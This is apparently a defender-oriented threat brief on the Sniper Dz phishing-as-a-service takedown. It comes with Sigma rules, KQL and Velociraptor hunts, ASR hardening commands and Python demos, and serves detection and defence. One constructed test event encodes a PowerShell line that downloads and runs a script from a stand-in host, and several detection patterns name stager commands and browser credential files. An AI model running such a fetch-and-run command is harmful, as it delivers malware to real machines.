Introduction
Between October 2025 and February 2026, INTERPOL's Operation Ramz struck a significant blow against the cybercriminal ecosystem with the takedown of "Sniper Dz," a prolific Phishing-as-a-Service (PhaaS) platform that had been active for over a decade. The coordinated effort across 13 MENA countries resulted in 201 arrests, including the platform's primary administrator, known as Guedz.
For defenders, the dismantling of Sniper Dz is a significant win. PhaaS platforms lower the barrier to entry by handing novice criminals ready-made phishing kits, hosting infrastructure and automation tools. The infrastructure is down, but the tactics, techniques and procedures (TTPs) that Sniper Dz popularized remain in wide use, so SOC teams must stay alert to credential-harvesting and social engineering campaigns built on similar PhaaS tooling.
Technical Analysis
Threat Overview: Sniper Dz operated as a subscription-based service, offering users a dashboard to launch customized phishing attacks. Like modern PhaaS platforms (e.g., Darcula, Legion), it likely provided:
- Phishing Kits: Pre-built templates mimicking major financial institutions and email services.
- Automation: Tools for mass email distribution and link rotation to bypass URL scanners.
- Credential Harvesting: Mechanisms to capture and exfiltrate user credentials and 2FA tokens in real-time.
The Attack Chain (PhaaS Model):
- Initial Access: Targeted users receive a phishing email, which often slips past the secure email gateway because the link is obfuscated or rotated faster than URL reputation feeds update.
- Execution: User clicks a link leading to a credential harvesting page (often hosted on compromised legitimate domains).
- Collection: Entered credentials are captured by the PhaaS backend.
- Exploitation: Actors use stolen credentials for initial access to corporate networks, lateral movement, or data exfiltration.
Affected Assets: This is a service takedown rather than a software vulnerability, so the "affected" assets are user credentials and the identity infrastructure these campaigns target (Okta, Microsoft Entra ID (formerly Azure AD), Microsoft 365). No CVEs are associated with this item; the risk lies in the effectiveness of the social engineering methodology.
Detection & Response
Detecting PhaaS campaigns requires a shift from static signature matching to behavioral analysis. We focus on detecting the execution chain initiated by phishing payloads and the subsequent credential harvesting activity.
Sigma Rules
The following rules detect suspicious process spawning patterns often associated with phishing document detonation and the execution of harvesting tools.
---
title: Suspicious Child Process of Email Client
id: a8b9c0d1-2e3f-4a5b-6c7d-8e9f0a1b2c3d
status: experimental
description: Detects a shell or script host spawned directly by an email client, a common indicator of a malicious attachment being opened or a phishing link being activated from the mail client.
references:
    - https://attack.mitre.org/techniques/T1566/
author: Security Arsenal
date: 2026-06-15
tags:
    - attack.initial_access
    - attack.t1566
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\outlook.exe'
            - '\olk.exe'
            - '\thunderbird.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
            - '\mshta.exe'
            - '\wscript.exe'
            - '\cscript.exe'
    condition: all of selection_*
falsepositives:
    - Legitimate automation scripts run by IT staff
    - Mail client add-ins that launch scripts
level: high
---
title: PowerShell Suspicious Base64 Encoded Command
id: b1c2d3e4-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects PowerShell launched with an encoded-command switch (-e, -ec, -enc, -EncodedCommand or any other unambiguous prefix) followed by a long Base64 blob, a pattern commonly used by phishing-delivered loaders to hide the download and execution of a second stage.
references:
    - https://attack.mitre.org/techniques/T1059/001/
    - https://attack.mitre.org/techniques/T1027/010/
author: Security Arsenal
date: 2026-06-15
tags:
    - attack.execution
    - attack.t1059.001
    - attack.defense_evasion
    - attack.t1027.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cmd:
        CommandLine|re: '(?i)\s-e[a-z]{0,13}\s+[A-Za-z0-9+/=]{50,}'
    condition: all of selection_*
falsepositives:
    - Administrative and deployment tooling that encodes its own scripts (e.g. SCCM, Intune)
level: medium
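The two rules are easier to tune once you can run their logic over real records and see what the encoded blob actually contains. The following Python is an added example, not code from the original page or from any vendor: it applies both rules to constructed Sysmon-style process_creation events and decodes the -EncodedCommand argument (PowerShell expects Base64 over a UTF-16LE string) so the analyst can separate a downloader from a management agent that merely encodes a benign command. Paths, hostnames and events are constructed for illustration.

```python
"""Added example (not from the original page): evaluates the two Sigma rules
above against constructed process_creation events and decodes -EncodedCommand.
The paths, hostnames and events below are constructed; the only real behaviour
relied on is that -EncodedCommand takes Base64 of a UTF-16LE string."""
import base64
import re
from typing import Optional

EMAIL_CLIENTS = ("\\outlook.exe", "\\olk.exe", "\\thunderbird.exe")
SCRIPT_HOSTS = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe",
                "\\mshta.exe", "\\wscript.exe", "\\cscript.exe")
POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")

# Same pattern as the Sigma rule: any prefix of -EncodedCommand, then >= 50 Base64 chars.
ENCODED_CMD_RE = re.compile(r"\s-e[a-z]{0,13}\s+([A-Za-z0-9+/=]{50,})", re.IGNORECASE)
# Downloader/stager idioms worth escalating on once the blob is decoded.
STAGER_RE = re.compile(
    r"\b(iex|invoke-expression|downloadstring|downloadfile|net\.webclient|"
    r"invoke-webrequest|frombase64string)\b", re.IGNORECASE)


def rule_email_client_child(event: dict) -> bool:
    """Sigma rule 1: shell or script host spawned directly by a mail client."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    return parent.endswith(EMAIL_CLIENTS) and image.endswith(SCRIPT_HOSTS)


def rule_encoded_powershell(event: dict) -> bool:
    """Sigma rule 2: PowerShell launched with a long encoded command."""
    image = event.get("Image", "").lower()
    return image.endswith(POWERSHELL) and ENCODED_CMD_RE.search(event.get("CommandLine", "")) is not None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext behind -EncodedCommand; None if absent or not UTF-16LE Base64."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # operators sometimes strip the padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> list:
    """Apply both rules and, when a blob is present, inspect what it decodes to."""
    hits = []
    if rule_email_client_child(event):
        hits.append("email_client_child")
    if rule_encoded_powershell(event):
        hits.append("encoded_powershell")
        decoded = decode_encoded_command(event["CommandLine"])
        if decoded and STAGER_RE.search(decoded):
            hits.append("decoded_downloader")
    return hits


def encode_powershell(cmd: str) -> str:
    """Produce the argument -EncodedCommand expects: Base64 over UTF-16LE."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"

# Constructed events, not real telemetry.
SAMPLE_EVENTS = [
    {   # loader launched from Outlook with an encoded downloader: all three hits
        "ParentImage": OUTLOOK, "Image": PS,
        "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(
            "IEX (New-Object Net.WebClient).DownloadString('http://phish.example/stage2.ps1')")},
    {   # Outlook handing an attachment to Word: benign for these two rules
        "ParentImage": OUTLOOK,
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\AppData\Local\Temp\invoice.docx"'},
    {   # admin script; -ExecutionPolicy must not be mistaken for -EncodedCommand
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {   # management agent using -EncodedCommand legitimately: rule 2 only, decoding clears it
        "ParentImage": r"C:\Windows\CCM\CcmExec.exe", "Image": PS,
        "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + encode_powershell(
            "Get-Service -Name WinDefend | Select-Object Status")},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        name = ev["Image"].rsplit("\\", 1)[-1]
        print(f"{name:16} hits={triage(ev)}")
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded:
            print("    decoded:", decoded)
```

The fourth event is the usual source of noise for rule 2: it fires, but decoding shows a service query rather than a stager, which is the cheap enrichment that lets an analyst close it without opening the host. Note the regex deliberately accepts any prefix of -EncodedCommand, because PowerShell does too.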
KQL (Microsoft Sentinel / Defender)
This query hunts for an Office application spawning a shell or script host, a strong indicator of a macro-enabled or exploit-laden document delivered through a phishing campaign. InitiatingProcessCommandLine is included so the analyst can see which document was open when the child process was spawned.
let OfficeApps = dynamic(["WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE", "ONENOTE.EXE"]);
let ShellProcesses = dynamic(["POWERSHELL.EXE", "PWSH.EXE", "CMD.EXE", "MSHTA.EXE", "CSCRIPT.EXE", "WSCRIPT.EXE"]);
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ OfficeApps
| where FileName in~ ShellProcesses
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, FolderPath
| order by Timestamp desc
Velociraptor VQL
This VQL hunts for shells or script hosts reading browser credential stores (the infostealer behaviour often seen after a successful phishing hook) and for unexpected child processes of browsers. The original version had an operator-precedence bug (AND binds tighter than OR, so every powershell.exe matched) and used chain(), which runs queries in sequence and does not expose parent/child rows; both are corrected here.
-- Hunt for shells or script hosts touching browser credential stores.
-- "History" is omitted on purpose: it also matches Get-History and similar benign commands.
SELECT Pid, Ppid, Name, CommandLine, Username
FROM pslist()
WHERE Name =~ '(?i)^(powershell|pwsh|cmd)\.exe$'
  AND CommandLine =~ '(?i)Copy-Item|Compress-Archive|Select-String|xcopy|copy '
  AND CommandLine =~ '(?i)Login Data|Cookies|Web Data|Local State'

-- Also check for unexpected child processes of browsers.
-- Materialise the process list once instead of calling pslist() per browser process.
LET procs <= SELECT Pid, Ppid, Name, CommandLine FROM pslist()

SELECT * FROM foreach(
  row={
    SELECT Pid AS ParentPid, Name AS ParentName
    FROM procs
    WHERE Name =~ '(?i)^(chrome|msedge|firefox)\.exe$'
  },
  query={
    SELECT ParentPid, ParentName, Pid, Name, CommandLine
    FROM procs
    WHERE Ppid = ParentPid
      AND NOT Name =~ '(?i)^(chrome|msedge|firefox|software_reporter_tool)\.exe$'
  })
Remediation Script (PowerShell)
This script enables Attack Surface Reduction (ASR) rules that blunt the delivery stage of phishing campaigns: Office applications may not create child processes or executable content, and email clients and webmail may not launch executable content. The second rule ID in the original was mislabelled; 3B576869-A4EC-4529-8536-B80A7769E899 is "Block Office applications from creating executable content", not the Win32 API rule.
# Configure ASR rules to mitigate phishing delivery mechanisms
# Requires Microsoft Defender Antivirus with real-time protection enabled;
# Defender for Endpoint adds central reporting but is not needed for enforcement.
# Run elevated. Roll out in AuditMode first and review the ASR events
# (Event ID 1122 = audit, 1121 = block) before switching to Enabled.

# D4F940AB-401B-4EFC-AADC-AD5F3C50688A: Block all Office applications from creating child processes
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

# 3B576869-A4EC-4529-8536-B80A7769E899: Block Office applications from creating executable content
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Enabled

# BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550: Block executable content from email client and webmail
Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 -AttackSurfaceReductionRules_Actions Enabled

# Verify: Get-MpPreference returns the IDs and actions as two parallel arrays, so pair them up
$pref = Get-MpPreference
for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
    '{0} => {1}' -f $pref.AttackSurfaceReductionRules_Ids[$i], $pref.AttackSurfaceReductionRules_Actions[$i]
}
Remediation
While Operation Ramz has disrupted the specific Sniper Dz infrastructure, the threat of PhaaS persists. Implement the following defensive measures immediately:
- Enable strict phishing filters: Configure the secure email gateway (Proofpoint, Mimecast, Microsoft Defender for Office 365) with impersonation protection (display-name and lookalike-domain checks) and enable URL detonation with time-of-click rewriting for all links, since PhaaS kits rotate links faster than static reputation lists update.
- Disable macro execution: Set the Group Policy "Block macros from running in Office files from the Internet" so that documents carrying the Mark of the Web cannot run VBA, and enforce it by policy rather than relying on the Office default, which a user can override. Macro-laden attachments remain a common payload vector in phishing campaigns.
- Deploy FIDO2/WebAuthn: Move beyond TOTP and SMS MFA. PhaaS platforms increasingly bundle real-time Adversary-in-the-Middle (AitM) reverse proxies (Evilginx2 is the best-known open-source example) that relay the one-time code along with the password and capture the resulting session cookie. FIDO2 authenticators (hardware keys such as YubiKeys, or platform passkeys) bind each assertion to the origin the browser is actually connected to, so an assertion produced on a lookalike domain is rejected by the real site.
- User education: Run awareness training promptly, using the Sniper Dz takedown as a real-world example of how professionalized social engineering has become.
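The reason FIDO2 survives an AitM proxy while TOTP does not is worth seeing in code. The following Python is an added example, not code from the original page or from any FIDO implementation: it models the pieces of a WebAuthn assertion that an attacker cannot influence (the browser writes the origin into clientDataJSON, the authenticator hashes the RP ID into authenticatorData, and both are under the signature) and shows what the relying party sees when the ceremony runs on a phishing origin. The RP ID, origins and challenge handling are constructed, and HMAC over a secret shared by the toy authenticator and the RP stands in for the ECDSA key pair registered at enrolment; the origin binding being demonstrated does not depend on the signature algorithm.

```python
"""Added example (not from the original page): why a FIDO2/WebAuthn assertion
cannot be relayed by an AitM phishing proxy. Assumptions: RP ID, origins and
the phishing host are constructed; HMAC with a shared secret stands in for the
authenticator's ECDSA private key and the RP's registered public key."""
import base64
import hashlib
import hmac
import json
import os
import struct

RP_ID = "login.example.com"                            # constructed relying party
RP_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login-example.com.evil.test"  # constructed AitM proxy origin


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


class Authenticator:
    """Toy authenticator: signs authenticatorData || SHA-256(clientDataJSON)."""

    def __init__(self) -> None:
        self.cred_key = os.urandom(32)  # stands in for the credential private key
        self.counter = 0

    def get_assertion(self, rp_id: str, client_data_json: bytes):
        self.counter += 1
        # authenticatorData = rpIdHash (32 bytes) || flags (UP set) || signCount (4 bytes)
        auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + struct.pack(">I", self.counter)
        to_sign = auth_data + hashlib.sha256(client_data_json).digest()
        return auth_data, hmac.new(self.cred_key, to_sign, hashlib.sha256).digest()


class Browser:
    """The parts of the WebAuthn client that page script cannot influence."""

    @staticmethod
    def host_of(origin: str) -> str:
        return origin.split("://", 1)[1].split("/", 1)[0]

    @staticmethod
    def rp_id_allowed(origin: str, rp_id: str) -> bool:
        # Simplified: rp_id must equal the origin host or be a parent domain of it.
        host = Browser.host_of(origin)
        return host == rp_id or host.endswith("." + rp_id)

    @staticmethod
    def client_data(origin: str, challenge: bytes) -> bytes:
        # The browser, not the page, fills in the origin it is really connected to.
        return json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                           "origin": origin}, separators=(",", ":")).encode()


def verify_assertion(cred_key: bytes, challenge: bytes, client_data_json: bytes,
                     auth_data: bytes, sig: bytes) -> list:
    """RP-side checks. Returns the list of failed checks; [] means accepted."""
    failed = []
    cd = json.loads(client_data_json)
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != b64url(challenge):
        failed.append("challenge_mismatch")
    if cd.get("origin") != RP_ORIGIN:
        failed.append("origin_mismatch")
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        failed.append("rp_id_hash_mismatch")
    if not auth_data[32] & 0x01:
        failed.append("user_not_present")
    to_sign = auth_data + hashlib.sha256(client_data_json).digest()
    if not hmac.compare_digest(hmac.new(cred_key, to_sign, hashlib.sha256).digest(), sig):
        failed.append("bad_signature")
    return failed


def login(authenticator: Authenticator, page_origin: str, requested_rp_id: str) -> list:
    """One ceremony: the RP issues a challenge (an AitM proxy forwards it unchanged)
    and the victim's browser is on page_origin. Returns the RP's failed checks."""
    challenge = os.urandom(32)
    if not Browser.rp_id_allowed(page_origin, requested_rp_id):
        return ["browser_refused_rp_id"]      # SecurityError in the real API
    cdj = Browser.client_data(page_origin, challenge)
    auth_data, sig = authenticator.get_assertion(requested_rp_id, cdj)
    return verify_assertion(authenticator.cred_key, challenge, cdj, auth_data, sig)


def replay_captured_assertion(authenticator: Authenticator) -> list:
    """An assertion captured from a genuine login, presented against a new challenge."""
    cdj = Browser.client_data(RP_ORIGIN, os.urandom(32))
    auth_data, sig = authenticator.get_assertion(RP_ID, cdj)
    return verify_assertion(authenticator.cred_key, os.urandom(32), cdj, auth_data, sig)


if __name__ == "__main__":
    auth = Authenticator()
    print("genuine login            :", login(auth, RP_ORIGIN, RP_ID))
    print("AitM page claims real RP :", login(auth, PHISH_ORIGIN, RP_ID))
    print("AitM page uses own RP ID :", login(auth, PHISH_ORIGIN, Browser.host_of(PHISH_ORIGIN)))
    print("replayed assertion       :", replay_captured_assertion(auth))
```

The proxy has only two options and both fail: if its page asks the browser for the real RP ID, the browser refuses because the page is not on that domain; if it uses its own RP ID, the assertion carries the phishing origin and the wrong rpIdHash under a valid signature, so the real site rejects it. A relayed TOTP code carries no such binding, which is why the AitM kits named above defeat it. Real browsers apply a stricter registrable-suffix check than the simplified rp_id_allowed here.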